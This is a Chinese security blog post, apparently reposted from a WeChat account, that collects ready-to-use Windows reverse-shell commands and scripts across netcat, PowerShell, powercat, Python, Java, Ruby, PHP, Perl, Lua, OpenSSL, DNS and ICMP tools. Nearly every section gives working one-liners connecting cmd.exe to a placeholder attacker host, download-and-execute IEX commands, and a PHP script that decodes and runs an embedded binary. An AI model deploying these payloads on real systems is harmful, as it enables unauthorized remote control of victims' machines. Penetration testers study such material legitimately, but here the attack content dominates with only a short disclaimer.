反弹shell之Windows反向shell

admin 2021年6月1日04:53:12评论998 views字数 17958阅读59分51秒阅读模式
我的爱不是发传单,也不会烂大街。
你的心不会动摇我的爱。
我是垃圾
但我的爱不是!
△△△点击上方“蓝字”关注我们了解更多精彩




   





0x00 简介

reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。


本文主要是介绍我整理在windows下使用各种语言反弹shell大纲。

篇幅过长,所以只讲实际项目,原理的话已经有很多前辈们写过了。

反弹shell之Windows反向shell

ps:全文中1.1.1.1代指公网主机IP, 4444指代监听端口。
ps:部分语言没有找到最基础的正反向shell代码,但是有其高配版,可以自行修改。
ps:由于是按照行为与系统进行分类的,可能会导致部分项目的工具是重复的。


0x01 netcat-windows

netcat 下载:

https://eternallybored.org/misc/netcat/#建议考虑使用Ncat

攻击机监听:

nc -lp 4444
服务端反弹:
nc  1.1.1.1 4444 -e c:windowssystem32cmd.exencat 1.1.1.1 4444 -e c:windowssystem32cmd.exe




0x02 Powershell-windows

攻击者主机上执行监听:

nc -lvvp 4444

在目标主机上执行:


#OK 成功反弹shellpowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()   
#OK 成功反弹shellpowershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"               
#ERROR 发起连接后没有响应powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("1.1.1.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell综合反弹shell项目
mini-reverse.ps1  #文件不能直接使用,需要先修改反弹IP#修改IP后远程下载反弹shellpowershell -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SkullSec/mini-reverse/master/mini-reverse.ps1')   #本地下载修改IP后执行反弹powershell -NoP -NonI -W Hidden -Exec Bypass .mini-reverse.ps1 
powershell-reverse-tcp #PS正向bind与反向shell集合https://github.com/ivan-sincek/powershell-reverse-tcp
CodeExecution-Meterpreter.ps1#通过powershell反弹meterpreterhttps://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1




0x03 powercat
powercat是netcat的powershell版本,测试不免杀了

远程下载执行:
PS C:WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 1.1.1.1 -p 4444 -e cmd

下载到目标机器本地执行:

PS C:WWW> Import-Module ./powercat.ps1PS C:WWW> powercat -c 1.1.1.1 -p 4444 -e cmd
上传powercat-shell
#1、生成shell反弹脚本PS C:> Set-ExecutionPolicy UnrestrictedPS C:> cd .powercatPS C:powercat> Import-Module .powercat.ps1PS C:powercat> powercat -c 1.1.1.1 -p 4444 -e cmd -g >> payload.ps1
#2#VPS监听反向shellnc -lvp 8080
#3、把payload.ps1丢到目标机器上去执行powershellexec bypassCommand "& {Import-Module 'C:payload.ps1'}"




0x04 python2-windows

python2 windows反向shell

#攻击者主机上执行监听:nc -lvvp 4444
#在目标主机上执行:python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1.1.1.1', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\windows\system32\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

python UDP反弹shell

https://github.com/ecthros/udpshell
#攻击者主机上执行监听:nc -l -p 53 -u #注意这里务必要用udp的模式来接
在目标主机上执行:python2 udpshell.py 1.1.1.1 53 udp  #linux OK;windows OK;

其他python 反弹shell项目:
Windows正向绑定shell和反向反弹shell的Python代码 https://www.cnblogs.com/KevinGeorge/p/9780151.html



0x05 Java-windows

攻击者主机上执行监听:

nc -lvvp 4444

目标靶机编译并运行java脚本:

#shell.java import java.net.*;import java.io.*;import java.io.OutputStream;import java.io.InputStream;public class shell{public static void main (String args[]) throws Exception{int c;Socket s=new Socket("1.1.1.1",4444);Process p=new ProcessBuilder("C:\Windows\System32\cmd.exe").redirectErrorStream(true).start();InputStream pin=p.getInputStream(),sin=s.getInputStream();OutputStream pout=p.getOutputStream(),sout =s.getOutputStream();while(!s.isClosed()){while( pin.available() > 0 ){sout.write(pin.read());} while( sin.available() > 0){pout.write(sin.read());} pout.flush();sout.flush();try{p.exitValue();break;} catch (Exception e){}} p.destroy();s.close();}} 
#使用:javac shell.java && java shell#注意:编译前需要修改文件名=内部类名
shell.java代码格式化
//Author  #Captain_Nemoimport java.net.*;import java.io.*;import java.io.OutputStream;import java.io.InputStream;
public class shell {
public static void main (String args[]) throws Exception { int c; Socket s = new Socket("1.1.1.1" ,4444); //Runtime r = Runtime.getRuntime(); // Process p = r.exec(new String[] {"C:\Windows\System32\cmd.exe", "/K", "Start"}); Process p = new ProcessBuilder("C:\Windows\System32\cmd.exe").redirectErrorStream(true).start(); InputStream pin = p.getInputStream(),sin=s.getInputStream(); OutputStream pout = p.getOutputStream(),sout =s.getOutputStream(); while(!s.isClosed()) { while( pin.available() > 0 ) { //int buff = in.read(); sout.write(pin.read()); } while( sin.available() > 0) { //int buff1 = in1.read(); pout.write(sin.read()); } pout.flush(); sout.flush(); try{ p.exitValue(); break; } catch (Exception e){} } // end while
p.destroy(); s.close(); } //end main } //end class def


0x06 ruby-windows
ruby windows反向shell代码
攻击者主机上执行监听:nc -lvvp 4444
在目标主机上执行:ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"  #ERROR 连接后断开; Error;ruby -rsocket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end"  #ERROR 连接后断开; Error;ruby -r socket -e "c=TCPSocket.new('1.1.1.1','4444');while(cmd=c.gets);IO.popen(cmd){|io|c.print io.read}end"  #OK

#通用ruby反向shell代码
#!/usr/bin/env rubyrequire 'socket'require 'open3'#Set the Remote Host IPRHOST = "1.1.1.1"#Set the Remote Host PortPORT = "4444"#Tries to connect every 20 sec until it connects.beginsock = TCPSocket.new "#{RHOST}", "#{PORT}"sock.puts "We are connected!"rescue sleep 20retryend#Runs the commands you type and sends you back the stdout and stderr.beginwhile line = sock.gets Open3.popen2e("#{line}") do | stdin, stdout_and_stderr | IO.copy_stream(stdout_and_stderr, sock)endendrescueretryend

Ruby正反向shell相关项目https://github.com/Hood3dRob1n/Ruby-Bind-and-Reverse-Shells


0x07 php-windows

    PHP环境下访问即可反弹到指定IP端口一个普通交互shell,需要php需未禁用exec函数

#php-reverse-shell-win
<?phpheader('Content-type: text/plain');$ip   = "1.1.1.1"; //change this $port = "4444"; //change this$payload = "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";$evalCode = gzinflate(base64_decode($payload));$evalArguments = " ".$port." ".$ip;$tmpdir ="C:\windows\temp";chdir($tmpdir);$res .= "Using dir : ".$tmpdir;$filename = "D3fa1t_shell.exe";$file = fopen($filename, 'wb');fwrite($file, $evalCode);fclose($file);$path = $filename;$cmd = $path.$evalArguments;$res .= "nnExecuting : ".$cmd."n";echo $res;$output = system($cmd);                ?>

通用的php反向shell项目:


php-reverse-shell #适用Linux和macOS和 Windows 
https://github.com/ivan-sincek/php-reverse-shell #linux测试通过,支持作为web脚本
#php_reverse_shell.php PHP v5.0.0 或更高版本#php_reverse_shell_older.php 需要PHP v4.3.0或更高版本。



0x08 OpenSSL-windows
参考文章:使用 OpenSSL 反弹加密shellhttps://www.cnblogs.com/heycomputer/articles/10697865.html


在 Windows 系统上反弹加密shell 的方式有点不一样

具体命令如下:

openssl s_client -quiet -connect [ip]:[port1] | cmd.exe | openssl s_client -quiet -connect [ip]:[port2]

以上命令会从 [ip]:[port1] 获取命令发送给 cmd.exe执行,然后把结果返回到 [ip]:[port2]


因此在本机需要启动两个 s_server

#从 port1 发送命令到 cmdopenssl s_server -quiet -key [keyfile] -cert [cert] -port [port1]
#从 port2 获取发送给 port1的命令执行结果openssl s_server -quiet -key [keyfile] -cert [cert] -port [port2]





0x09 perl-windows


攻击者主机上执行监听:

nc -lvvp 4444

在目标主机上执行:

perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'1.1.1.1:4444);STDIN->fdopen($c,r);$~->fdopen($c,w) ;system$_ while<>;"   #测试OK



0x10 lua


Windows and Linux下通用lua反弹shell语句
#攻击者主机上执行监听:nc -lvvp 4444
#在目标主机上执行:lua5.1 -e 'local host, port = "1.1.1.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'      #linux lua5.1 OK;





0x11 dns-windows

dnscat2 通过DNS协议创建加密的命令和控制通道

#github项目地址:https://github.com/iagox86/dnscat2

#服务端:ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open
#目标主机:powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx




0x12 icmp-windows

icmpsh是一个简单的ICMP反弹shell,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。

icmpsh工具使用简单,是一个跨平台工具,运行不需要管理员权限。

https://github.com/inquisb/icmpsh




0x13 VNC GUI
        VNC是类似RDP远程桌面的图形化远程管理工具,服务端支持正向监听和反向连接客户端。
powershell Invoke-Vnchttps://github.com/klsecservices/Invoke-Vnc#powershell在内存中执行VNC反向连接或绑定到指定端口。
tightvnc 免安装版#免安装的VNC服务端和客户端#不知道从哪里获取的版本,公众号回复【共享】获取文件
参考文章#命令行下实现VNC反向连接https://blog.csdn.net/kf/article/details/8567726#UltraVNC反向连接方式的使用https://blog.csdn.net/skydust1979/article/details/105935444/



0x14 C-CPP-CSharp

HARS 一款基于C#的加密反向shellhttps://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
LOLBITS 一款基于C#的加密反向shellhttps://github.com/Kudaes/LOLBITS.git



0x15 golang-windows


Hershell 一款功能强大的跨平台反向Shell生成器https://github.com/lesnuages/hershell
ReverseGoShell 具有AES动态加密功能的Golang反向Shell工具https://github.com/TheKingOfDuck/ReverseGoShell



0x16 其他上线方式

cpl反弹meterpreterhttps://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp#使用方法:生成dll,重命名为cpl,双击执行





0x17 Summary 总结

本文任何相关代码或工具如未标出地址,请萌新群联系。
本文仅供技术参考,勿用于非法用途,否则后果自负。

PS:摸鱼又出差去了,文章都没人改了!

END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!


或添加NOVASEC-MOYU 以便于及时回复。

反弹shell之Windows反向shell


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!!



本文始发于微信公众号(NOVASEC):反弹shell之Windows反向shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月1日04:53:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   反弹shell之Windows反向shellhttp://cn-sec.com/archives/282269.html

发表评论

匿名网友 填写信息